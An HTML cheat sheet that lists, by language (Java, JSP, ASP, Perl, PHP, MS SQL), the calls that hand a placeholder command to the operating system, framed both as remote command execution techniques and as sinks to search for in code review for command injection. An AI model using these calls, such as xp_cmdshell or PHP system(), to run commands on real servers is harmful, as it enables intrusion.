<html>
<head>
<title>Remote Command Execution Cheat Sheet</title>
<META http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="robots" CONTENT="index all, follow">
</head>
<body>

<div class=Section1>

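<p class=doctext><span lang=EN-GB>This table lists, by language, the
techniques that can be used for remote command execution. Each entry hands a
command string to the underlying operating system, so these are also the calls
to search for when reviewing source code for command injection.</span></p>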

<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
 style='width:100.0%'>
 <tr>
  <td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
  <h5 align=center style='text-align:center'><a name=app03table01></a><span
  lang=EN-GB style='font-size:10.5pt;font-family:Arial'>Table: Remote
  Command Execution Cheat Sheet</span></h5>
  </td>
 </tr>
 <tr>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
  font-family:Arial;color:black'>Web Application Environment</span></b></span><b><span
  style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
  </td>
  <td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
  font-family:Arial;color:black'>Source Code</span></b></span><b><span
  style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
  </td>
  <td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>

  <p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
  font-family:Arial;color:black'>Additional Information</span></b></span><b><span
  style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>Java Servlet </span></p>
  </td>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre><span lang=EN-GB>class Example</span></pre><pre><span
  lang=EN-GB>     extends HttpServlet</span></pre><pre><span lang=EN-GB>{</span></pre><pre><span
  lang=EN-GB>     .</span></pre><pre><span lang=EN-GB>     .</span></pre><pre><span
  lang=EN-GB>     .</span></pre><pre><span lang=EN-GB>     void function()</span></pre><pre><span
  lang=EN-GB>     {</span></pre><pre><span lang=EN-GB>Runtime r = Runtime.getRuntime();</span></pre><pre><span
  lang=EN-GB>Process p = r.exec(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;,</span></pre><pre><span
  class=docemphasis1>&lt;arguments&gt;</span>);</pre><pre>}</pre><pre>     .</pre><pre>     .</pre><pre>     .</pre><pre>}</pre></td>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a
  href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
  target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>
  </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>Java Server Pages (JSP) </span></p>

  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre>&lt;%</pre><pre>     Runtime r =</pre><pre>Runtime.getRuntime();</pre><pre>     Process p =</pre><pre>r.exec(&quot;<span
  class=docemphasis1>&lt;command&gt;</span>&quot;,</pre><pre><span
  class=docemphasis1>&lt;arguments&gt;</span>);</pre><pre>%&gt;</pre></td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a
  href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
  target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>

  </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>Active Server Pages (ASP) </span></p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>

  <p class=doctext><span lang=EN-GB>If Windows Scripting Host</span></p>
  <p class=doctext><span lang=EN-GB>is installed on the target</span></p>
  <p class=doctext><span lang=EN-GB>system:</span></p>
  <pre><span lang=EN-GB>&lt;%</span></pre><pre><span lang=EN-GB>     Set wsh =</span></pre><pre><span
  lang=EN-GB>Server.CreateObject(&quot;Wscript.shell&quot;)</span></pre><pre><span
  lang=EN-GB>     </span>wsh.run(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;);</pre><pre>%&gt;</pre></td>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a
  href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp"
  target="_blank"><span style='color:#003399'>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp</span></a>
  </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>PERL </span></p>

  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=doctext><span lang=EN-GB>In PERL, commands are executed by wrapping
  them with the backtick symbol (`)</span></p>
  <p class=doctext><span lang=EN-GB>$result = `<span class=docemphasis1>&lt;command&gt;</span>`;</span></p>
  <p class=doctext><span lang=EN-GB>or</span></p>
  <p class=doctext><span lang=EN-GB>system(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;);</span></p>

  <p class=doctext>or</p>
  <p class=doctext>open(IN, &quot;<span class=docemphasis1>&lt;command&gt;</span>
  |&quot;);</p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a href="http://www.perldoc.com/perl5.6/pod/perlfunc.html"
  target="_blank"><span style='color:#003399'>http://www.perldoc.com/perl5.6/pod/perlfunc.html</span></a>

  </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>PHP </span></p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>

  <p class=doctext><span lang=EN-GB>&lt;? system(&quot;<span
  class=docemphasis1>&lt;command&gt;</span>&quot;) ?&gt;</span></p>
  <p class=doctext><span lang=EN-GB>or</span></p>
  <p class=doctext><span lang=EN-GB>&lt;? shell_exec(&quot;<span
  class=docemphasis1>&lt;command&gt;</span>&quot;) ?&gt;</span></p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>

  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a href="http://www.php.net/manual/en/function.shell-exec.php"
  target="_blank"><span lang=EN-GB style='color:#003399'>http://www.php.net/manual/en/function.shell-exec.php</span></a></span><span
  style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>MS SQL </span></p>
  </td>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
  color:black'>EXEC master..xp_cmdshell &quot;&lt;command&gt;&quot; </span></p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
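  <p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
  color:black'>xp_cmdshell is disabled by default from SQL Server 2005 onward
  and must be enabled through sp_configure by a sysadmin; leaving it disabled
  and running the database service under a low-privilege account limits what
  an injected statement can reach.</span></p>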
  </td>
 </tr>

</table>


</div>


<br>



</body>

</html>

